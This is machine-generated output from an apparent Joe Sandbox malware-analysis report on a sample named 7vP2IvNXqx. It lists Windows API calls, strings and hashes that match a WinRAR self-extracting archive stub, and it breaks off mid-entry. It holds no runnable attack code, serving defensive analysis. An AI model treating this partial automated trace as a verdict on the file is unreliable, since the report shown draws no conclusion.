25123->25125 25126 2da732 GetLastError 25124->25126 25132 2da709 25124->25132 25127 2da6d0 25125->25127 25125->25132 25126->25132 25128 2dbb03 GetCurrentDirectoryW 25127->25128 25129 2da6e0 25128->25129 25130 2da6fe GetLastError 25129->25130 25131 2da6e4 FindFirstFileW 25129->25131 25130->25132 25131->25130 25131->25132 25132->24711 25133->24516 25134->24522 25135->24522 25136->24525 25137->24533 25139 2d9f42 78 API calls 25138->25139 25140 2d1fe8 25139->25140 25141 2d1a04 101 API calls 25140->25141 25144 2d2005 25140->25144 25142 2d1ff5 25141->25142 25142->25144 25145 2d138b 74 API calls 25142->25145 25144->24541 25144->24542 25145->25144 25147 2eb5bc GetDlgItem 25146->25147 25148 2eb583 GetMessageW 25146->25148 25147->24552 25147->24553 25149 2eb5a8 TranslateMessage DispatchMessageW 25148->25149 25150 2eb599 IsDialogMessageW 25148->25150 25149->25147 25150->25147 25150->25149 25325 2e94e0 GetClientRect 25351 2e21e0 26 API calls std::bad_exception::bad_exception 25365 2ef2e0 46 API calls __RTC_Initialize 25366 2fbee0 GetCommandLineA GetCommandLineW 25326 2f2cfb 38 API calls 4 library calls 25352 2d95f0 80 API calls 25367 2d5ef0 82 API calls 25174 2f98f0 25182 2fadaf 25174->25182 25177 2f9904 25179 2f990c 25180 2f9919 25179->25180 25190 2f9920 11 API calls 25179->25190 25183 2fac98 _abort 5 API calls 25182->25183 25184 2fadd6 25183->25184 25185 2fadee TlsAlloc 25184->25185 25188 2faddf 25184->25188 25185->25188 25186 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25187 2f98fa 25186->25187 25187->25177 25189 2f9869 20 API calls 2 library calls 25187->25189 25188->25186 25189->25179 25190->25177 25191 2fabf0 25192 2fabfb 25191->25192 25193 2faf0a 11 API calls 25192->25193 25194 2fac24 25192->25194 25195 2fac20 25192->25195 25193->25192 25197 2fac50 DeleteCriticalSection 25194->25197 25197->25195 25328 2f88f0 7 API calls ___scrt_uninitialize_crt 25354 2efd4f 9 API calls 2 library calls 25390 302bd0 VariantClear 25369 2e62ca 123 API calls __InternalCxxFrameHandler 25205 2edec2 25206 2edecf 25205->25206 25207 2de617 53 API calls 25206->25207 25208 2ededc 25207->25208 25209 2d4092 _swprintf 51 API calls 25208->25209 25210 2edef1 SetDlgItemTextW 25209->25210 25211 2eb568 5 API calls 25210->25211 25212 2edf0e 25211->25212 25355 2eb5c0 100 API calls 25392 2e77c0 118 API calls 25393 2effc0 RaiseException _com_error::_com_error CallUnexpected 25370 2f0ada 51 API calls 2 library calls 25276 2d10d5 25281 2d5abd 25276->25281 25282 2d5ac7 __EH_prolog 25281->25282 25283 2db505 84 API calls 25282->25283 25284 2d5ad3 25283->25284 25288 2d5cac GetCurrentProcess GetProcessAffinityMask 25284->25288 25289 2ee2d7 25290 2ee1db 25289->25290 25291 2ee85d ___delayLoadHelper2@8 14 API calls 25290->25291 25291->25290 25330 2ef4d3 20 API calls 25294 2ee1d1 14 API calls ___delayLoadHelper2@8 25394 2fa3d0 21 API calls 2 library calls

                                        Executed Functions

                                        Function 002EDF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 002E0863: GetModuleHandleW.KERNEL32(kernel32), ref: 002E087C
                                          • Part of subcall function 002E0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002E088E
                                          • Part of subcall function 002E0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002E08BF
                                          • Part of subcall function 002EA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 002EA655
                                          • Part of subcall function 002EAC16: OleInitialize.OLE32(00000000), ref: 002EAC2F
                                          • Part of subcall function 002EAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002EAC66
                                          • Part of subcall function 002EAC16: SHGetMalloc.SHELL32(00318438), ref: 002EAC70
                                        • GetCommandLineW.KERNEL32 ref: 002EDF5C
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 002EDF83
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 002EDF94
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 002EDFCE
                                          • Part of subcall function 002EDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002EDBF4
                                          • Part of subcall function 002EDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002EDC30
                                        • CloseHandle.KERNEL32(00000000), ref: 002EDFD7
                                        • GetModuleFileNameW.KERNEL32(00000000,0032EC90,00000800), ref: 002EDFF2
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,0032EC90), ref: 002EDFFE
                                        • GetLocalTime.KERNEL32(?), ref: 002EE009
                                        • _swprintf.LIBCMT ref: 002EE048
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 002EE05A
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002EE061
                                        • LoadIconW.USER32(00000000,00000064), ref: 002EE078
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 002EE0C9
                                        • Sleep.KERNEL32(?), ref: 002EE0F7
                                        • DeleteObject.GDI32 ref: 002EE130
                                        • DeleteObject.GDI32(?), ref: 002EE140
                                        • CloseHandle.KERNEL32 ref: 002EE183
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz2
                                        • API String ID: 3049964643-2627256826
                                        • Opcode ID: 87f77b40214cdd033d0fd2a4e4b2783ea44009b3c87fbc90cd37ada8d8728ffa
                                        • Instruction ID: a4481743f175d570045f3b595ce7024e53dcfe8327bce100651ee16d82180558
                                        • Opcode Fuzzy Hash: 87f77b40214cdd033d0fd2a4e4b2783ea44009b3c87fbc90cd37ada8d8728ffa
                                        • Instruction Fuzzy Hash: 31616771955385AFD722AFB6EC59FAB37ACAB0C700F40002AF90A92291DF749D54CB61
                                        Function 002EA6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 802 2ea6c2-2ea6df FindResourceW 803 2ea7db 802->803 804 2ea6e5-2ea6f6 SizeofResource 802->804 805 2ea7dd-2ea7e1 803->805 804->803 806 2ea6fc-2ea70b LoadResource 804->806 806->803 807 2ea711-2ea71c LockResource 806->807 807->803 808 2ea722-2ea737 GlobalAlloc 807->808 809 2ea73d-2ea746 GlobalLock 808->809 810 2ea7d3-2ea7d9 808->810 811 2ea7cc-2ea7cd GlobalFree 809->811 812 2ea74c-2ea76a call 2f0320 809->812 810->805 811->810 816 2ea76c-2ea78e call 2ea626 812->816 817 2ea7c5-2ea7c6 GlobalUnlock 812->817 816->817 822 2ea790-2ea798 816->822 817->811 823 2ea79a-2ea7ae GdipCreateHBITMAPFromBitmap 822->823 824 2ea7b3-2ea7c1 822->824 823->824 825 2ea7b0 823->825 824->817 825->824
                                        APIs
                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,002EB73D,00000066), ref: 002EA6D5
                                        • SizeofResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA6EC
                                        • LoadResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA703
                                        • LockResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA712
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,002EB73D,00000066), ref: 002EA72D
                                        • GlobalLock.KERNEL32(00000000), ref: 002EA73E
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 002EA762
                                        • GlobalUnlock.KERNEL32(00000000), ref: 002EA7C6
                                          • Part of subcall function 002EA626: GdipAlloc.GDIPLUS(00000010), ref: 002EA62C
                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002EA7A7
                                        • GlobalFree.KERNEL32(00000000), ref: 002EA7CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                        • String ID: Fjun.$PNG
                                        • API String ID: 211097158-3291020314
                                        • Opcode ID: 37356b51feb33a79e405eeb836921483997db0e2e1140379822aeb41e9246039
                                        • Instruction ID: d8718899f9999f0295bf74d58c4c43d34c09ec67727ef8109dc435a755163fc8
                                        • Opcode Fuzzy Hash: 37356b51feb33a79e405eeb836921483997db0e2e1140379822aeb41e9246039
                                        • Instruction Fuzzy Hash: E031B375651342AFD7129F22EC98D5BBFBDEF8D750F040519F90582260EB31ED60CAA2
                                        Function 002DA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1032 2da69b-2da6bf call 2eec50 1035 2da727-2da730 FindNextFileW 1032->1035 1036 2da6c1-2da6ce FindFirstFileW 1032->1036 1037 2da742-2da7ff call 2e0602 call 2dc310 call 2e15da * 3 1035->1037 1038 2da732-2da740 GetLastError 1035->1038 1036->1037 1039 2da6d0-2da6e2 call 2dbb03 1036->1039 1043 2da804-2da811 1037->1043 1040 2da719-2da722 1038->1040 1047 2da6fe-2da707 GetLastError 1039->1047 1048 2da6e4-2da6fc FindFirstFileW 1039->1048 1040->1043 1050 2da709-2da70c 1047->1050 1051 2da717 1047->1051 1048->1037 1048->1047 1050->1051 1052 2da70e-2da711 1050->1052 1051->1040 1052->1051 1054 2da713-2da715 1052->1054 1054->1040
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6C4
                                          • Part of subcall function 002DBB03: _wcslen.LIBCMT ref: 002DBB27
                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6F2
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA6FE
                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,002DA592,000000FF,?,?), ref: 002DA728
                                        • GetLastError.KERNEL32(?,?,?,?,002DA592,000000FF,?,?), ref: 002DA734
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                        • String ID:
                                        • API String ID: 42610566-0
                                        • Opcode ID: eeaa75869fe4274646df38c35a0fa309d38c543ae8bc83deb8e9e5fcf7348090
                                        • Instruction ID: 52fe944c79d3531c4433d430783e6ec6f20f73886a6630cc2c59986f7f70c6a5
                                        • Opcode Fuzzy Hash: eeaa75869fe4274646df38c35a0fa309d38c543ae8bc83deb8e9e5fcf7348090
                                        • Instruction Fuzzy Hash: BD418F72911155ABCB25DF64CC84AEEF7B8FB48350F104197E95AE3200D774AEA0CF91
                                        Function 002F7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002,00000000), ref: 002F7E0F
                                        • TerminateProcess.KERNEL32(00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002,00000000), ref: 002F7E16
                                        • ExitProcess.KERNEL32 ref: 002F7E28
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 4463961274cb8bb3cdeb8a61e75c711578d9947bb5cbf9f3ec1bb442873ec145
                                        • Instruction ID: 515c6e76d9d357c70020ba5f7e297b219e297add2d3e0990f754b94ec3d42716
                                        • Opcode Fuzzy Hash: 4463961274cb8bb3cdeb8a61e75c711578d9947bb5cbf9f3ec1bb442873ec145
                                        • Instruction Fuzzy Hash: 68E04F3101214CABDF066F10CD09A59BF6DEB10381F104466FA158A132CB35DE62CA80
                                        Function 002D848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: fa8083a5c4325a09f52deaf1355fa1606d6ca918228dae9d09ddb51d22cf3110
                                        • Instruction ID: 739efee08c229e08622257d01769635b245f7053e9a64dae6d04576ee765edba
                                        • Opcode Fuzzy Hash: fa8083a5c4325a09f52deaf1355fa1606d6ca918228dae9d09ddb51d22cf3110
                                        • Instruction Fuzzy Hash: 4B821F70924146AEDF15DF64C895BFAB7B9BF05300F0841BBE8499B382DB715EA4CB60
                                        Function 002EB7E0 Relevance: 109.2, APIs: 48, Strings: 14, Instructions: 731windowfilesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002EB7E5
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EB8D1
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB8EF
                                        • IsDialogMessageW.USER32(?,?), ref: 002EB902
                                        • TranslateMessage.USER32(?), ref: 002EB910
                                        • DispatchMessageW.USER32(?), ref: 002EB91A
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 002EB93D
                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 002EB960
                                        • GetDlgItem.USER32(?,00000068), ref: 002EB983
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002EB99E
                                        • SendMessageW.USER32(00000000,000000C2,00000000,003035F4), ref: 002EB9B1
                                          • Part of subcall function 002ED453: _wcschr.LIBVCRUNTIME ref: 002ED45C
                                          • Part of subcall function 002ED453: _wcslen.LIBCMT ref: 002ED47D
                                        • SetFocus.USER32(00000000), ref: 002EB9B8
                                        • _swprintf.LIBCMT ref: 002EBA24
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                          • Part of subcall function 002ED4D4: GetDlgItem.USER32(00000068,0032FCB8), ref: 002ED4E8
                                          • Part of subcall function 002ED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,002EAF07,00000001,?,?,002EB7B9,0030506C,0032FCB8,0032FCB8,00001000,00000000,00000000), ref: 002ED510
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002ED51B
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,003035F4), ref: 002ED529
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED53F
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002ED559
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED59D
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002ED5AB
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002ED5BA
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002ED5E1
                                          • Part of subcall function 002ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,003043F4), ref: 002ED5F0
                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 002EBA68
                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 002EBA90
                                        • GetTickCount.KERNEL32 ref: 002EBAAE
                                        • _swprintf.LIBCMT ref: 002EBAC2
                                        • GetLastError.KERNEL32(?,00000011), ref: 002EBAF4
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 002EBB43
                                        • _swprintf.LIBCMT ref: 002EBB7C
                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 002EBBD0
                                        • GetCommandLineW.KERNEL32 ref: 002EBBEA
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 002EBC47
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 002EBC6F
                                        • Sleep.KERNEL32(00000064), ref: 002EBCB9
                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 002EBCE2
                                        • CloseHandle.KERNEL32(00000000), ref: 002EBCEB
                                        • _swprintf.LIBCMT ref: 002EBD1E
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EBD7D
                                        • SetDlgItemTextW.USER32(?,00000065,003035F4), ref: 002EBD94
                                        • GetDlgItem.USER32(?,00000065), ref: 002EBD9D
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 002EBDAC
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002EBDBB
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EBE68
                                        • _wcslen.LIBCMT ref: 002EBEBE
                                        • _swprintf.LIBCMT ref: 002EBEE8
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 002EBF32
                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 002EBF4C
                                        • GetDlgItem.USER32(?,00000068), ref: 002EBF55
                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 002EBF6B
                                        • GetDlgItem.USER32(?,00000066), ref: 002EBF85
                                        • SetWindowTextW.USER32(00000000,0031A472), ref: 002EBFA7
                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 002EC007
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EC01A
                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 002EC0BD
                                        • EnableWindow.USER32(00000000,00000000), ref: 002EC197
                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 002EC1D9
                                          • Part of subcall function 002EC73F: __EH_prolog.LIBCMT ref: 002EC744
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 002EC1FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<.$STARTDLG$^.$__tmp_rar_sfx_access_check_%u$h.$winrarsfxmappingfile.tmp$Q0
                                        • API String ID: 3829768659-673372891
                                        • Opcode ID: a040cd09d2138fe55347c35d5a9a20d45190d9247c4a185304624a14cb8a43a3
                                        • Instruction ID: ba29931f1231dd4ca3a0cd6b04530c7b1ecbfa4887ff75281bcd031e39024ad1
                                        • Opcode Fuzzy Hash: a040cd09d2138fe55347c35d5a9a20d45190d9247c4a185304624a14cb8a43a3
                                        • Instruction Fuzzy Hash: 96421270DA4295BEEB23AFA29C8AFBF376CAB05700F504055F604A61D2CB745E65CF21
                                        Function 002E0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 269 2e0863-2e0886 call 2eec50 GetModuleHandleW 272 2e0888-2e089f GetProcAddress 269->272 273 2e08e7-2e0b48 269->273 276 2e08b9-2e08c9 GetProcAddress 272->276 277 2e08a1-2e08b7 272->277 274 2e0b4e-2e0b59 call 2f75fb 273->274 275 2e0c14-2e0c40 GetModuleFileNameW call 2dc29a call 2e0602 273->275 274->275 286 2e0b5f-2e0b8d GetModuleFileNameW CreateFileW 274->286 291 2e0c42-2e0c4e call 2db146 275->291 280 2e08cb-2e08e0 276->280 281 2e08e5 276->281 277->276 280->281 281->273 289 2e0b8f-2e0b9b SetFilePointer 286->289 290 2e0c08-2e0c0f CloseHandle 286->290 289->290 292 2e0b9d-2e0bb9 ReadFile 289->292 290->275 298 2e0c7d-2e0ca4 call 2dc310 GetFileAttributesW 291->298 299 2e0c50-2e0c5b call 2e081b 291->299 292->290 295 2e0bbb-2e0be0 292->295 297 2e0bfd-2e0c06 call 2e0371 295->297 297->290 306 2e0be2-2e0bfc call 2e081b 297->306 309 2e0cae 298->309 310 2e0ca6-2e0caa 298->310 299->298 308 2e0c5d-2e0c7b CompareStringW 299->308 306->297 308->298 308->310 312 2e0cb0-2e0cb5 309->312 310->291 311 2e0cac 310->311 311->312 314 2e0cec-2e0cee 312->314 315 2e0cb7 312->315 317 2e0dfb-2e0e05 314->317 318 2e0cf4-2e0d0b call 2dc2e4 call 2db146 314->318 316 2e0cb9-2e0ce0 call 2dc310 GetFileAttributesW 315->316 323 2e0cea 316->323 324 2e0ce2-2e0ce6 316->324 328 2e0d0d-2e0d6e call 2e081b * 2 call 2de617 call 2d4092 call 2de617 call 2ea7e4 318->328 329 2e0d73-2e0da6 call 2d4092 AllocConsole 318->329 323->314 324->316 326 2e0ce8 324->326 326->314 335 2e0df3-2e0df5 ExitProcess 328->335 334 2e0da8-2e0ded GetCurrentProcessId AttachConsole call 2f3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 329->334 329->335 334->335
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 002E087C
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002E088E
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002E08BF
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002E0B69
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E0B83
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002E0B93
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<0,00000000), ref: 002E0BB1
                                        • CloseHandle.KERNEL32(00000000), ref: 002E0C09
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002E0C1E
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<0,?,00000000,?,00000800), ref: 002E0C72
                                        • GetFileAttributesW.KERNELBASE(?,?,|<0,00000800,?,00000000,?,00000800), ref: 002E0C9C
                                        • GetFileAttributesW.KERNEL32(?,?,D=0,00000800), ref: 002E0CD8
                                          • Part of subcall function 002E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                          • Part of subcall function 002E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        • _swprintf.LIBCMT ref: 002E0D4A
                                        • _swprintf.LIBCMT ref: 002E0D96
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • AllocConsole.KERNEL32 ref: 002E0D9E
                                        • GetCurrentProcessId.KERNEL32 ref: 002E0DA8
                                        • AttachConsole.KERNEL32(00000000), ref: 002E0DAF
                                        • _wcslen.LIBCMT ref: 002E0DC4
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002E0DD5
                                        • WriteConsoleW.KERNEL32(00000000), ref: 002E0DDC
                                        • Sleep.KERNEL32(00002710), ref: 002E0DE7
                                        • FreeConsole.KERNEL32 ref: 002E0DED
                                        • ExitProcess.KERNEL32 ref: 002E0DF5
                                        Strings
                                        Memory Dump Source
